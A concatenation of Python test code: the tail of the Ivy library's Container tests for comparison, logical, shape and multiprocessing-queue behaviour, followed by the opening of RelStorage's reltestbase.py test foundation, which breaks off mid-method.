# def test_container_less_than_or_equal_to(dev, call):
# container_a = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([5], dev=dev), 'd': ivy.array([5], dev=dev)}})
# container_b = Container({'a': ivy.array([2], dev=dev),
# 'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([5], dev=dev)}})
# container = container_a <= container_b
# assert np.allclose(ivy.to_numpy(container['a']), np.array([True]))
# assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
# assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([False]))
# assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
# assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([True]))
# assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_scalar_equal_to(dev, call):
container = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container = container == 2
assert np.allclose(ivy.to_numpy(container['a']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_reverse_scalar_equal_to(dev, call):
container = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container = 2 == container
assert np.allclose(ivy.to_numpy(container['a']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_equal_to(dev, call):
container_a = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([5], dev=dev), 'd': ivy.array([5], dev=dev)}})
container_b = Container({'a': ivy.array([2], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([5], dev=dev)}})
container = container_a == container_b
assert np.allclose(ivy.to_numpy(container['a']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
# def test_container_scalar_not_equal_to(dev, call):
# container = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
# container = container != 2
# assert np.allclose(ivy.to_numpy(container['a']), np.array([True]))
# assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
# assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([False]))
# assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
# assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([True]))
# assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
# def test_container_reverse_scalar_not_equal_to(dev, call):
# container = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
# container = 2 != container
# assert np.allclose(ivy.to_numpy(container['a']), np.array([True]))
# assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
# assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([False]))
# assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
# assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([True]))
# assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
# def test_container_not_equal_to(dev, call):
# container_a = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([5], dev=dev), 'd': ivy.array([5], dev=dev)}})
# container_b = Container({'a': ivy.array([2], dev=dev),
# 'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([5], dev=dev)}})
# container = container_a != container_b
# assert np.allclose(ivy.to_numpy(container['a']), np.array([True]))
# assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
# assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([True]))
# assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
# assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([False]))
# assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_scalar_greater_than(dev, call):
container = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container = container > 2
assert np.allclose(ivy.to_numpy(container['a']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_reverse_scalar_greater_than(dev, call):
container = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container = 2 > container
assert np.allclose(ivy.to_numpy(container['a']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_greater_than(dev, call):
container_a = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([5], dev=dev), 'd': ivy.array([5], dev=dev)}})
container_b = Container({'a': ivy.array([2], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([5], dev=dev)}})
container = container_a > container_b
assert np.allclose(ivy.to_numpy(container['a']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_scalar_greater_than_or_equal_to(dev, call):
container = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container = container >= 2
assert np.allclose(ivy.to_numpy(container['a']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
# def test_container_reverse_scalar_greater_than_or_equal_to(dev, call):
# container = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
# container = 2 >= container
# assert np.allclose(ivy.to_numpy(container['a']), np.array([True]))
# assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
# assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([True]))
# assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
# assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([False]))
# assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_greater_than_or_equal_to(dev, call):
container_a = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([5], dev=dev), 'd': ivy.array([5], dev=dev)}})
container_b = Container({'a': ivy.array([2], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([5], dev=dev)}})
container = container_a >= container_b
assert np.allclose(ivy.to_numpy(container['a']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_scalar_and(dev, call):
container = Container({'a': ivy.array([True], dev=dev),
'b': {'c': ivy.array([True], dev=dev), 'd': ivy.array([False], dev=dev)}})
container = container & True
# ToDo: work out why "container and True" does not work. Perhaps bool(container) is called first implicitly?
assert np.allclose(ivy.to_numpy(container['a']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_reverse_scalar_and(dev, call):
container = Container({'a': ivy.array([True], dev=dev),
'b': {'c': ivy.array([True], dev=dev), 'd': ivy.array([False], dev=dev)}})
container = True and container
assert np.allclose(ivy.to_numpy(container['a']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_and(dev, call):
container_a = Container({'a': ivy.array([True], dev=dev),
'b': {'c': ivy.array([True], dev=dev), 'd': ivy.array([False], dev=dev)}})
container_b = Container({'a': ivy.array([False], dev=dev),
'b': {'c': ivy.array([True], dev=dev), 'd': ivy.array([False], dev=dev)}})
container = container_a and container_b
assert np.allclose(ivy.to_numpy(container['a']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_scalar_or(dev, call):
container = Container({'a': ivy.array([True], dev=dev),
'b': {'c': ivy.array([True], dev=dev), 'd': ivy.array([False], dev=dev)}})
container = container or False
assert np.allclose(ivy.to_numpy(container['a']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_reverse_scalar_or(dev, call):
container = Container({'a': ivy.array([True], dev=dev),
'b': {'c': ivy.array([True], dev=dev), 'd': ivy.array([False], dev=dev)}})
container = container or False
assert np.allclose(ivy.to_numpy(container['a']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_or(dev, call):
container_a = Container({'a': ivy.array([True], dev=dev),
'b': {'c': ivy.array([True], dev=dev), 'd': ivy.array([False], dev=dev)}})
container_b = Container({'a': ivy.array([False], dev=dev),
'b': {'c': ivy.array([True], dev=dev), 'd': ivy.array([False], dev=dev)}})
container = container_a or container_b
assert np.allclose(ivy.to_numpy(container['a']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_not(dev, call):
container = ~Container({'a': ivy.array([True], dev=dev),
'b': {'c': ivy.array([True], dev=dev), 'd': ivy.array([False], dev=dev)}})
assert np.allclose(ivy.to_numpy(container['a']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_scalar_xor(dev, call):
if call is helpers.mx_call:
# MXnet arrays do not overload the ^ operator, can add if explicit ivy.logical_xor is implemented at some point
pytest.skip()
container = Container({'a': ivy.array([True], dev=dev),
'b': {'c': ivy.array([True], dev=dev), 'd': ivy.array([False], dev=dev)}})
container = container != True
assert np.allclose(ivy.to_numpy(container['a']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_reverse_scalar_xor(dev, call):
if call is helpers.mx_call:
# MXnet arrays do not overload the ^ operator, can add if explicit ivy.logical_xor is implemented at some point
pytest.skip()
container = Container({'a': ivy.array([True], dev=dev),
'b': {'c': ivy.array([True], dev=dev), 'd': ivy.array([False], dev=dev)}})
container = False != container
assert np.allclose(ivy.to_numpy(container['a']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_xor(dev, call):
if call is helpers.mx_call:
# MXnet arrays do not overload the ^ operator, can add if explicit ivy.logical_xor is implemented at some point
pytest.skip()
container_a = Container({'a': ivy.array([True], dev=dev),
'b': {'c': ivy.array([True], dev=dev), 'd': ivy.array([False], dev=dev)}})
container_b = Container({'a': ivy.array([False], dev=dev),
'b': {'c': ivy.array([True], dev=dev), 'd': ivy.array([False], dev=dev)}})
container = container_a != container_b
assert np.allclose(ivy.to_numpy(container['a']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_shape(dev, call):
dict_in = {'a': ivy.array([[[1.], [2.], [3.]]], dev=dev),
'b': {'c': ivy.array([[[2.], [4.], [6.]]], dev=dev),
'd': ivy.array([[[3.], [6.], [9.]]], dev=dev)}}
container = Container(dict_in)
assert container.shape == [1, 3, 1]
dict_in = {'a': ivy.array([[[1.], [2.], [3.]]], dev=dev),
'b': {'c': ivy.array([[[2., 3.], [4., 5.], [6., 7.]]], dev=dev),
'd': ivy.array([[[3.], [6.], [9.]]], dev=dev)}}
container = Container(dict_in)
assert container.shape == [1, 3, None]
dict_in = {'a': ivy.array([[[1., 2.], [2., 3.], [3., 4.]]], dev=dev),
'b': {'c': ivy.array([[[2., 3.], [4., 5.], [6., 7.]]], dev=dev),
'd': ivy.array([[[3., 4.], [6., 7.], [9., 10.]]], dev=dev)}}
container = Container(dict_in)
assert container.shape == [1, 3, 2]
def test_container_shapes(dev, call):
dict_in = {'a': ivy.array([[[1.], [2.], [3.]]], dev=dev),
'b': {'c': ivy.array([[[2.], [4.]]], dev=dev), 'd': ivy.array([[9.]], dev=dev)}}
container_shapes = Container(dict_in).shapes
assert list(container_shapes['a']) == [1, 3, 1]
assert list(container_shapes.a) == [1, 3, 1]
assert list(container_shapes['b']['c']) == [1, 2, 1]
assert list(container_shapes.b.c) == [1, 2, 1]
assert list(container_shapes['b']['d']) == [1, 1]
assert list(container_shapes.b.d) == [1, 1]
# def test_container_dev_str(dev, call):
# dict_in = {'a': ivy.array([[[1.], [2.], [3.]]], dev=dev),
# 'b': {'c': ivy.array([[[2.], [4.], [6.]]], dev=dev),
# 'd': ivy.array([[[3.], [6.], [9.]]], dev=dev)}}
# container = Container(dict_in)
# assert container.dev_str == dev
def test_container_create_if_absent(dev, call):
dict_in = {'a': ivy.array([[[1.], [2.], [3.]]], dev=dev),
'b': {'c': ivy.array([[[2.], [4.], [6.]]], dev=dev),
'd': ivy.array([[[3.], [6.], [9.]]], dev=dev)}}
# depth 1
container = Container(dict_in)
container.create_if_absent('a', None, True)
assert np.allclose(ivy.to_numpy(container.a), np.array([[[1.], [2.], [3.]]]))
container.create_if_absent('e', ivy.array([[[4.], [8.], [12.]]]), True)
assert np.allclose(ivy.to_numpy(container.e), np.array([[[4.], [8.], [12.]]]))
# depth 2
container.create_if_absent('f/g', np.array([[[5.], [10.], [15.]]]), True)
assert np.allclose(ivy.to_numpy(container.f.g), np.array([[[5.], [10.], [15.]]]))
def test_container_if_exists(dev, call):
dict_in = {'a': ivy.array([[[1.], [2.], [3.]]], dev=dev),
'b': {'c': ivy.array([[[2.], [4.], [6.]]], dev=dev),
'd': ivy.array([[[3.], [6.], [9.]]], dev=dev)}}
container = Container(dict_in)
assert np.allclose(ivy.to_numpy(container.if_exists('a')), np.array([[[1.], [2.], [3.]]]))
assert 'c' not in container
assert container.if_exists('c') is None
container['c'] = ivy.array([[[1.], [2.], [3.]]], dev=dev)
assert np.allclose(ivy.to_numpy(container.if_exists('c')), np.array([[[1.], [2.], [3.]]]))
assert container.if_exists('d') is None
container.d = ivy.array([[[1.], [2.], [3.]]], dev=dev)
assert np.allclose(ivy.to_numpy(container.if_exists('d')), np.array([[[1.], [2.], [3.]]]))
def test_jax_pytree_compatibility(dev, call):
if call is not helpers.jnp_call:
pytest.skip()
# import
from jax.tree_util import tree_flatten
# dict in
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
# container
container = Container(dict_in)
# container flattened
cont_values = tree_flatten(container)[0]
# dict flattened
true_values = tree_flatten(dict_in)[0]
# assertion
for i, true_val in enumerate(true_values):
assert np.array_equal(ivy.to_numpy(cont_values[i]), ivy.to_numpy(true_val))
def test_container_from_queues(dev, call):
if 'gpu' in dev:
# Cannot re-initialize CUDA in forked subprocess. 'spawn' start method must be used.
pytest.skip()
if ivy.gpu_is_available() and call is helpers.jnp_call:
# Not found a way to set default device for JAX, and this causes issues with multiprocessing and CUDA,
# even when dev=cpu
# ToDo: find a fix for this problem ^^
pytest.skip()
def worker_fn(in_queue, out_queue, load_size, worker_id):
keep_going = True
while keep_going:
try:
keep_going = in_queue.get(timeout=0.1)
except queue.Empty:
continue
out_queue.put({'a': [ivy.to_native(ivy.array([1., 2., 3.], dev=dev)) * worker_id] * load_size})
workers = list()
in_queues = list()
out_queues = list()
queue_load_sizes = [1, 2, 1]
for i, queue_load_size in enumerate(queue_load_sizes):
input_queue = multiprocessing.Queue()
output_queue = multiprocessing.Queue()
worker = multiprocessing.Process(target=worker_fn, args=(input_queue, output_queue, queue_load_size, i + 1))
worker.start()
in_queues.append(input_queue)
out_queues.append(output_queue)
workers.append(worker)
container = Container(queues=out_queues, queue_load_sizes=queue_load_sizes, queue_timeout=0.25)
# queue 0
queue_was_empty = False
try:
container[0]
except queue.Empty:
queue_was_empty = True
assert queue_was_empty
in_queues[0].put(True)
assert np.allclose(ivy.to_numpy(container[0].a), np.array([1., 2., 3.]))
assert np.allclose(ivy.to_numpy(container[0].a), np.array([1., 2., 3.]))
# queue 1
queue_was_empty = False
try:
container[1]
except queue.Empty:
queue_was_empty = True
assert queue_was_empty
queue_was_empty = False
try:
container[2]
except queue.Empty:
queue_was_empty = True
assert queue_was_empty
in_queues[1].put(True)
assert np.allclose(ivy.to_numpy(container[1].a), np.array([2., 4., 6.]))
assert np.allclose(ivy.to_numpy(container[1].a), np.array([2., 4., 6.]))
assert np.allclose(ivy.to_numpy(container[2].a), np.array([2., 4., 6.]))
assert np.allclose(ivy.to_numpy(container[2].a), np.array([2., 4., 6.]))
# queue 2
queue_was_empty = False
try:
container[3]
except queue.Empty:
queue_was_empty = True
assert queue_was_empty
in_queues[2].put(True)
assert np.allclose(ivy.to_numpy(container[3].a), np.array([3., 6., 9.]))
assert np.allclose(ivy.to_numpy(container[3].a), np.array([3., 6., 9.]))
# stop workers
in_queues[0].put(False)
in_queues[1].put(False)
in_queues[2].put(False)
in_queues[0].close()
in_queues[1].close()
in_queues[2].close()
# join workers
for worker in workers:
worker.join()
del container
|
reltestbase.py
|
# -*- coding: utf-8; -*-
##############################################################################
#
# Copyright (c) 2008 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""A foundation for RelStorage tests"""
from __future__ import absolute_import
from __future__ import print_function
# pylint:disable=too-many-ancestors,abstract-method,too-many-public-methods,too-many-lines
# pylint:disable=too-many-statements,too-many-locals
import contextlib
import functools
import os
import random
import shutil
import tempfile
import time
import threading
import unittest
from textwrap import dedent
import transaction
from persistent import Persistent
from persistent.mapping import PersistentMapping
from zc.zlibstorage import ZlibStorage
import ZODB.tests.util
from ZODB.Connection import TransactionMetaData
from ZODB.DB import DB
from ZODB.FileStorage import FileStorage
from ZODB.POSException import ReadConflictError
from ZODB.POSException import ReadOnlyError
from ZODB.serialize import referencesf
from ZODB.utils import z64
from ZODB.utils import u64 as bytes8_to_int64
from ZODB.utils import p64 as int64_to_8bytes
from ZODB.tests import BasicStorage
from ZODB.tests import ConflictResolution
from ZODB.tests import MTStorage
from ZODB.tests import PackableStorage
from ZODB.tests import PersistentStorage
from ZODB.tests import ReadOnlyStorage
from ZODB.tests import StorageTestBase
from ZODB.tests import Synchronization
from ZODB.tests.StorageTestBase import zodb_pickle
from ZODB.tests.StorageTestBase import zodb_unpickle
from ZODB.tests.MinPO import MinPO
from . import fakecache
from . import util
from . import mock
from . import TestCase
from . import StorageCreatingMixin
from . import skipIfNoConcurrentWriters
from .persistentcache import PersistentCacheStorageTests
from .locking import TestLocking
from .test_zodbconvert import ZlibWrappedFSZODBConvertTests
class RelStorageTestBase(StorageCreatingMixin,
TestCase,
StorageTestBase.StorageTestBase):
base_dbname = None # Override
keep_history = None # Override
_storage_created = None
def _close(self):
# Override from StorageTestBase.
# Try to avoid creating one through our _storage property.
if '_storage' in self.__dict__:
storage = self._storage
else:
storage = self._storage_created
self._storage = None
if storage is not None:
storage.close()
storage.cleanup()
def make_storage_to_cache(self):
return self.make_storage()
def get_storage(self):
# Create a storage with default options
# if it has not been created already.
storage = self._storage_created
if storage is None:
storage = self.make_storage_to_cache()
self._storage_created = storage
return storage
def set_storage(self, storage):
self._storage_created = storage
_storage = property(
lambda self: self.get_storage(),
lambda self, nv: self.set_storage(nv)
)
def open(self, read_only=False, **kwargs):
# This is used by a few ZODB tests that close and reopen the storage.
storage = self._storage
if storage is not None:
self._storage = None
storage.close()
storage.cleanup()
self._storage = storage = self.make_storage(
read_only=read_only, zap=False, **kwargs)
return storage
class StorageClientThread(MTStorage.StorageClientThread):
# MTStorage assumes that the storage object is thread safe.
# This doesn't make any sense for an MVCC Storage like RelStorage;
# don't try to use a single instance in multiple threads.
#
# This patch makes it respect that.
def __init__(self, storage, *args, **kwargs):
storage = storage.new_instance()
super(StorageClientThread, self).__init__(storage, *args, **kwargs)
def runtest(self):
try:
super(StorageClientThread, self).runtest()
finally:
self.storage.release()
self.storage = None
class ExtStorageClientThread(StorageClientThread, MTStorage.ExtStorageClientThread):
"Same as above."
class ThreadWrapper(object):
def __init__(self, storage):
self.__storage = storage
# We can't use an RLock, which verifies that the thread that
# acquired is the one that releases; check_tid_ordering_w_commit
# deliberately spreads these actions across threads (for same reason).
self.__commit_lock = threading.Lock()
rl = self.__read_lock = threading.Lock()
self.__txn = None
def make_locked(name):
meth = getattr(storage, name)
@functools.wraps(meth)
def func(*args, **kwargs):
with rl:
return meth(*args, **kwargs)
return func
for name in (
'loadBefore',
'load',
'store',
'getTid',
'lastTransaction',
):
setattr(self, name, make_locked(name))
def __getattr__(self, name):
return getattr(self.__storage, name)
def tpc_begin(self, txn):
self.__commit_lock.acquire()
self.__read_lock.acquire()
assert not self.__txn
self.__txn = txn
self.__read_lock.release()
return self.__storage.tpc_begin(txn)
def tpc_finish(self, txn, callback=None):
self.__read_lock.acquire()
assert txn is self.__txn
try:
return self.__storage.tpc_finish(txn, callback)
finally:
self.__txn = None
self.__commit_lock.release()
self.__read_lock.release()
def tpc_abort(self, txn):
self.__read_lock.acquire()
assert txn is self.__txn, (txn, self.__txn)
try:
return self.__storage.tpc_abort(txn)
finally:
self.__txn = None
self.__commit_lock.release()
self.__read_lock.release()
class UsesThreadsOnASingleStorageMixin(object):
# These tests attempt to use threads on a single storage object.
# That doesn't make sense with MVCC, where every instance is its
# own connection and doesn't need to do any locking. This mixin makes
# those tests use a special storage that locks.
@contextlib.contextmanager
def __thread_safe_wrapper(self):
orig_storage = self._storage
wrapped = self._storage = ThreadWrapper(orig_storage)
try:
yield
finally:
if self._storage is wrapped:
self._storage = orig_storage
def __generic_wrapped_test(self, meth_name):
meth = getattr(
super(UsesThreadsOnASingleStorageMixin, self),
meth_name)
try:
with self.__thread_safe_wrapper():
meth()
finally:
self._storage.zap_all(slow=True)
def make_func(name): # pylint:disable=no-self-argument
return lambda self: self.__generic_wrapped_test(name)
for bad_test in (
'check_checkCurrentSerialInTransaction',
# This one stores a b'y' (invalid pickle) into the
# database as the root object, so if we don't get zapped
# afterwards, we can't open the database.
'check_tid_ordering_w_commit',
):
locals()[bad_test] = make_func(bad_test)
del make_func
del bad_test
class GenericRelStorageTests(
UsesThreadsOnASingleStorageMixin,
RelStorageTestBase,
PersistentCacheStorageTests,
TestLocking,
BasicStorage.BasicStorage,
PackableStorage.PackableStorage,
Synchronization.SynchronizedStorage,
ConflictResolution.ConflictResolvingStorage,
PersistentStorage.PersistentStorage,
MTStorage.MTStorage,
ReadOnlyStorage.ReadOnlyStorage,
):
def setUp(self):
# ZODB.tests.util.TestCase likes to change directories
# It tries to change back in tearDown(), but if there's an error,
# we may not get to tearDown. addCleanup() always runs, though.
# do that as the very last thing that happens (except for subclasses, they
# could add things first)
self.addCleanup(os.chdir, os.getcwd())
super(GenericRelStorageTests, self).setUp()
# PackableStorage is particularly bad about leaving things
# dangling. For example, if the ClientThread runs into
# problems, it doesn't close its connection, which can leave
# locks dangling until GC happens and break other threads and even
# other tests.
#
# Patch around that. Be sure to only close a given connection once,
# though.
_closing = self._closing
def db_factory(storage, *args, **kwargs):
db = _closing(DB(storage, *args, **kwargs))
db_open = db.open
def o(transaction_manager=None, at=None, before=None):
conn = db_open(transaction_manager=transaction_manager,
at=at,
before=before)
_closing(conn)
if transaction_manager is not None:
# If we're using an independent transaction, abort it *before*
# attempting to close the connection; that means it must be registered
# after the connection.
self.addCleanup(transaction_manager.abort)
return conn
db.open = o
return db
PackableStorage.DB = db_factory
self.addCleanup(setattr, MTStorage,
'StorageClientThread', MTStorage.StorageClientThread)
MTStorage.StorageClientThread = StorageClientThread
self.addCleanup(setattr, MTStorage,
'ExtStorageClientThread', MTStorage.ExtStorageClientThread)
MTStorage.ExtStorageClientThread = ExtStorageClientThread
def tearDown(self):
PackableStorage.DB = DB
super(GenericRelStorageTests, self).tearDown()
def _make_readonly(self):
# checkWriteMethods in ReadOnlyStorage assumes that
# the object has an undo() method, even though that's only
# required if it's IStorageUndoable, aka history-preserving.
super(GenericRelStorageTests, self)._make_readonly()
storage = self._storage
if not hasattr(storage, 'undo'):
def undo(*args, **kwargs):
raise ReadOnlyError
storage.undo = undo # pylint:disable=attribute-defined-outside-init
return storage
def checkCurrentObjectTidsRoot(self):
# Get the root object in place
db = self._closing(DB(self._storage))
conn = self._closing(db.open())
storage = conn._storage
cursor = storage._load_connection.cursor
oid_to_tid = storage._adapter.mover.current_object_tids(cursor, [0])
self.assertEqual(1, len(oid_to_tid))
self.assertIn(0, oid_to_tid)
# Ask for many, many objects that don't exist.
# Force the implementation to loop if that's what it does internally.
oid_to_tid = storage._adapter.mover.current_object_tids(cursor, range(0, 3523))
self.assertEqual(1, len(oid_to_tid))
self.assertIn(0, oid_to_tid)
# No matching oids.
oid_to_tid = storage._adapter.mover.current_object_tids(cursor, range(1, 3523))
self.assertEqual(0, len(oid_to_tid))
conn.close()
db.close()
def checkLen(self):
# Override the version from BasicStorage because we
# actually do guarantee to keep track of the counts,
# within certain limits.
# len(storage) reports the number of objects.
# check it is zero when empty
print ("##############################")
l = len(self._storage)
print (l)
print ("##############################")
self.assertEqual(len(self._storage), 0)
# check it is correct when the storage contains two object.
# len may also be zero, for storages that do not keep track
# of this number
self._dostore(data=PersistentMapping())
self._dostore(data=PersistentMapping())
self._storage._adapter.stats.large_database_change()
self.assertEqual(len(self._storage), 2)
def checkDropAndPrepare(self):
# Under PyPy, this test either takes a very long time (PyMySQL)
# or hangs (psycopg2cffi) longer than I want to wait (10+ minutes).
# This suggests there's a lock on a particular table (the eighth table we drop)
# which in turn suggests that there are connections still open and leaked!
